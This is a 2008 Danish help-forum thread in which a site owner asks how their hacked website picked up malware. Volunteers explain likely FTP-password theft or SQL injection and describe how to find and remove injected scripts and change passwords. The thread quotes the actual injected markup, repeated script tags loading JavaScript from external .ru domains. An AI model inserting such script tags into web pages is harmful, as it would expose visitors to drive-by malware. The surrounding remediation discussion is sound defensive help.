Virus på min hjemmeside? 07-08-08 20:38 : LuffeA 07-08-08 20:39 : LuffeA 07-08-08 20:47 : ferik 07-08-08 20:48 : Manse9933 07-08-08 20:53 : Manse9933 07-08-08 20:55 : Manse9933 07-08-08 20:59 : as_roma 07-08-08 21:11 : Manse9933 07-08-08 21:12 : Manse9933 07-08-08 21:15 : as_roma 07-08-08 21:17 : Manse9933 07-08-08 21:19 : as_roma 07-08-08 21:23 : Manse9933 07-08-08 21:31 : Manse9933 07-08-08 22:26 : as_roma 07-08-08 22:29 : Manse9933 07-08-08 22:31 : Manse9933 07-08-08 22:35 : as_roma 07-08-08 22:38 : Manse9933 07-08-08 22:41 : Manse9933 07-08-08 22:41 : as_roma 07-08-08 22:45 : Manse9933 07-08-08 22:47 : as_roma 07-08-08 22:47 : Manse9933 07-08-08 22:50 : as_roma 07-08-08 22:50 : Manse9933 07-08-08 22:52 : Manse9933 07-08-08 22:55 : Manse9933 07-08-08 22:57 : Manse9933 07-08-08 23:02 : Manse9933 07-08-08 23:12 : Manse9933 07-08-08 23:41 : miritdk 08-08-08 11:48 : Manse9933 08-08-08 11:49 : Manse9933

Virus på min hjemmeside? Fra : as_roma Vist : 918 gange 100 point Dato : 07-08-08 20:26

-------------------------------------------------------------------------------- Hej, håber nogen kan hjælpe. Jeg har på min hjemmeside www.kmk-graphic.dk fået noget virus af en art , hvor antivirus-programmet kommer op med en advarsel. Hvorfra kan jeg have fået virus på min hjemmeside? Ligger det lokalt på min computer og HVORDAN får jeg det væk? Skal jeg fjerne hjemmesiden fra nettet og lægge den op på ny? Nogle forslag?

Kommentar Fra : LuffeA Dato : 07-08-08 20:38

Den er god nok, den er dårlig Luk siden ned, et sådant link virker som en magnet på hundredvis af brugere trods advarslen. Scan computeren og upload siden igen.

Kommentar Fra : LuffeA Dato : 07-08-08 20:39

Iøvrigt er det "kun" malware, men det kan være slemt nok.

Kommentar Fra : ferik Dato : 07-08-08 20:47

prøv. www.arlet.dk

Kommentar Fra : Manse9933 Dato : 07-08-08 20:48

Det må være et java script,hent siden ned og tjek om der er et script som du ikke selv har lag ind>fjern det. Har du MySQL database f.eks. til forum/billede galleri/chat o.sv,s så skal du skifte adgangs kode/password for du er blevet hacket(ftp password) til denne. En virus skanner nede på din pc kan ikke finde et java script i et html dokument,scriptet er sat ind og henviser til en anden side med malware,malware kan være alt fra virus til trojaner oh meget andet. http://en.wikipedia.org/wiki/Malware

Kommentar Fra : Manse9933 Dato : 07-08-08 20:53

Det kan være en MySQL injection http://securitylabs.websense.com/content/Blogs/3099.aspx http://www.google.dk/search?hl=da&sa=X&oi=spell&resnum=0&ct=result&cd=1&q=MySQL+injection&spell=1

Kommentar Fra : Manse9933 Dato : 07-08-08 20:55

Det kan være denne du har fået > http://politiken.dk/tjek/digitalt/internet/article543118.ece

Kommentar Fra : as_roma Dato : 07-08-08 20:59

tak for alle svarene, undersøger lige sagen og vender tilbage...

Kommentar Fra : Manse9933 Dato : 07-08-08 21:11

Det er god nok google advare mod siden> http://www.google.dk/interstitial?url=http://www.kmk-graphic.dk/

Kommentar Fra : Manse9933 Dato : 07-08-08 21:12

http://www.google.com/safebrowsing/diagnostic?site=http://www.kmk-graphic.dk/

Kommentar Fra : as_roma Dato : 07-08-08 21:15

men ved I hvordan den fjernes? Er det nok og scanne computeren og lægge siden op igen?

Kommentar Fra : Manse9933 Dato : 07-08-08 21:17

Du kan prøve diagnosticer din side med google webmaster tools https://www.google.com/accounts/ServiceLogin?service=sitemaps&passive=true&nui=1&continue=http%3A%2F%2Fwww.google.com%2Fwebmasters%2Ftools%2Fdashboard&followup=http%3A%2F%2Fwww.google.com%2Fwebmasters%2Ftools%2Fdashboard&hl=da vis du har en G mail konto så kan du logge ind med den ellers kan du oprette en bruger,gratis.

Kommentar Fra : as_roma Dato : 07-08-08 21:19

ok undersøger det, du står snart til nogle points Manse

Kommentar Fra : Manse9933 Dato : 07-08-08 21:23

Det kan være du får et fingerpeg der gør det lettere for dig at finde problemet,ellers kan du åbne siden i din tekst editor ikke i din browser og gå op i >rediger>søg og så gennemsøge dokumentet med denne fil endelse> .js og se om et eller flere af disse scripts linker til sider du ikke kender,eller scripts du ikke selv har sat ind,højrekikp på dokumentet>åben med i feks. notesblok

Accepteret svar Fra : Manse9933 Modtaget 100 point Dato : 07-08-08 21:31

højreklik{,]husk at skifte password på din MySQL database (vis du har en sådan)og skift password til din FTP login på din server/domæne. Jeg kører selv med 256Bit password både i mine databaser og i min Ftp adgang. vis du ikke har en database så kan de have luret/hacket dit FTP password og så kan de bruge robot script/Ftp program til at lægge skadelige koder ind på dit domæne.

Kommentar Fra : as_roma Dato : 07-08-08 22:26

Har fundet noget i kodningen: <script src=http://www.kj5s.ru/fgg.js> src=http://www.kj5s.ru/fgg.js> src=http://www.kj5s.ru/fgg.js> src=http://www.kjwd.ru/fgg.js> src=http://www.kj5s.ru/fgg.js> osv osv osv, den blive ved længe, kan det være dét??

Kommentar Fra : Manse9933 Dato : 07-08-08 22:29

Jep,du kan også se at de henviser til russiske sider .ru Slet skittet.

Kommentar Fra : Manse9933 Dato : 07-08-08 22:31

Og til alle lad være med at klikke på de scripts henvisninger som as_roma har lagt ind,eller aktiveres de.

Godkendelse af svar Fra : as_roma Dato : 07-08-08 22:35

Tak for svaret Manse9933.

Kommentar Fra : Manse9933 Dato : 07-08-08 22:38

Husk at får ændret password.lange og sikre,nu skal du ikke bruge dette det er bare et eksempel 263 Bit styrke VCq4TDFGP7CCyRtzUD8SHKmgHssTdtRRom6QW2krajnLJ5 2975 Bit styrke oZVAAb5XExZCAkkBykzXZo3Cdr7GKNfaRoQPigi6Y2tyyqcrv97SNLuNsXQx7VfJ4rPvkFJdNwVfHsLtEUVAowWRf4XwpNgwtPiCFZJyZPYjskUjeeeThTinxtQcavH9JY7Nqt8EAYmTCQZC7ATwXeQBqyQ7B5snn5dTsa4gK9DtLkxHhxEzRMKaZqKNzor7zEmCHwK3PTLr4n2PgbekDR8JXVK897TZnnS9iQyCpF2ymYt5T6qAJmMrKTxtNzqu74wcTL6LJrZdY3jHY3HuqLWAcrGv5Y6C7tziRCZyc9e27MZAhYvXZ4wGMKbKHqBi5ejMCTErhUP5pbKBmF5GtuxcWwnuizx7SGfA4cp4gmGXkuo5nKUCvwjtKT3KkCHEqBjbsDyrpVDvaTntwUFAPDM564vxQbnFzKJuFqFtYbXZfTvuZvvAkfmpPMVX2LR8bsE56N464TcvVz7ki9UWQ2nhk4Nk2EVuvk2WuDv8XqWFZZbFhjCKPJHUJrq72Ts

Kommentar Fra : Manse9933 Dato : 07-08-08 22:41

Du skal nok også tjekke dine undersider,du kan nu søge på både .js og .ru + script src og se hvad du finder.

Kommentar Fra : as_roma Dato : 07-08-08 22:41

Er ens ftp så udsat? Har jeg ikke tænkt over..

Kommentar Fra : Manse9933 Dato : 07-08-08 22:45

Det kan saktens være dit ftp password der er hacket og det kan også være dit MQ password eller begge så ændre dem begge og lav dem med en høj Bit styrke.jeg har på fornemelsen af du har et svagt password i begge dele.

Kommentar Fra : as_roma Dato : 07-08-08 22:47

mysql har jeg ikke noget af... så vidt jeg ved Men må hellere få ændret det andet så. Kan det være kommet på andre måder?

Kommentar Fra : Manse9933 Dato : 07-08-08 22:47

Det FTP password ligger jo også oppe på dit domæne,ellers kan du ikke logge ind og det kan også opsnappes (mellem din pc og dit domæne)vis du har et dårligt FTP pogram eller det ikke er opdateret med de sidste sikkerheds opdateringer

Kommentar Fra : as_roma Dato : 07-08-08 22:50

køre med at seperat ftp program... så det ligger ikke på mit domæne så vidt jeg ved.

Kommentar Fra : Manse9933 Dato : 07-08-08 22:50

du skal ændre det oppe på dit domæne f.eks. vis du har et kontrolpanel og så skal du sætte dit nye password ind i din FTP klient bagefter,f.eks. 263 Bit styrke eller højre.

Kommentar Fra : Manse9933 Dato : 07-08-08 22:52

jo,f.eks. vis du skal logge ind på dit domæne så kontakter dit FTP program dit domæne og tjekker passwordet på domænet,passer det så med det du har i ftp programmet så får du adgang til serveren som dit domæne ligger på.

Kommentar Fra : Manse9933 Dato : 07-08-08 22:55

tjekker bruger navn og password på dit domæne's server passer de så får du adgang til serveren som domænet ligger på.

Kommentar Fra : Manse9933 Dato : 07-08-08 22:57

hos hvem har du dit webhotel/domæne?

Kommentar Fra : Manse9933 Dato : 07-08-08 23:02

jeg klikker mig ikke ind på din side. Vis du kun skifter bruger/pass i dit ftp program så kommer du ikke ind på dit domæne (server) Nå det er ved at være tid

Kommentar Fra : Manse9933 Dato : 07-08-08 23:12

God nat og sov godt. Manse klister øjne 9933

Kommentar Fra : miritdk Dato : 07-08-08 23:41

http://www.saugstrup.org/virus-beskyt-hjemmeside/

Kommentar Fra : Manse9933 Dato : 08-08-08 11:48

En anden lille ting du kan gøre er at højreklikke på din index fil oppe på serveren>File attributes og sætte den til> http://manse9933.dk/test_info/vis/1.htm Test om du kan åbne din side,vis så lad den stå på 644 vis ikke så 755,en lille smule mere sikker.

Kommentar Fra : Manse9933 Dato : 08-08-08 11:49

nu ved jeg ikke hvilken slaks server din side ligger på.

Du har følgende muligheder

Eftersom du ikke er logget ind i systemet, kan du ikke skrive et indlæg til dette spørgsmål. Hvis du ikke allerede er registreret, kan du gratis blive medlem, ved at trykke på "Bliv medlem" ude i menuen.